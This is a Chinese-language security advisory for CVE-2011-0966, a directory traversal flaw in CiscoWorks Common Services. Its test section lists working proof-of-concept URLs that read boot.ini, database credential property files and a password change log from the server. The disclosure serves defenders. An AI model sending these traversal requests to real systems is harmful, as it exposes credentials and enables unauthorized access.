安全研究

安全漏洞
CiscoWorks Common Services审核目录遍历漏洞

发布日期:2011-05-18
更新日期:2011-05-18

受影响系统:
Cisco CiscoWorks Common Services 3.x
Cisco CiscoWorks Common Services 2.x
Cisco CiscoWorks Common Services 1.x
描述:
BUGTRAQ  ID: 47905
CVE ID: CVE-2011-0966

CiscoWorks Common Services是CiscoWorks应用所共享的通用管理服务集。

CiscoWorks Common Services审核在实现上存在目录遍历漏洞,远程攻击者可通过目录变量字符串(例如'../')利用此漏洞获取目标系统上的任意文件,从而泄露敏感信息或导致完全控制受影响计算机。

<*来源:Sense of Security
  
  链接:http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
cmfDBA user database info:

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties DB connection info for all databases:

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties

Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example.
DB password change log:

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\log\dbpwdChange.log

建议:
厂商补丁:

Cisco
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.cisco.com/warp/public/707/advisory.html

浏览次数:2491
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障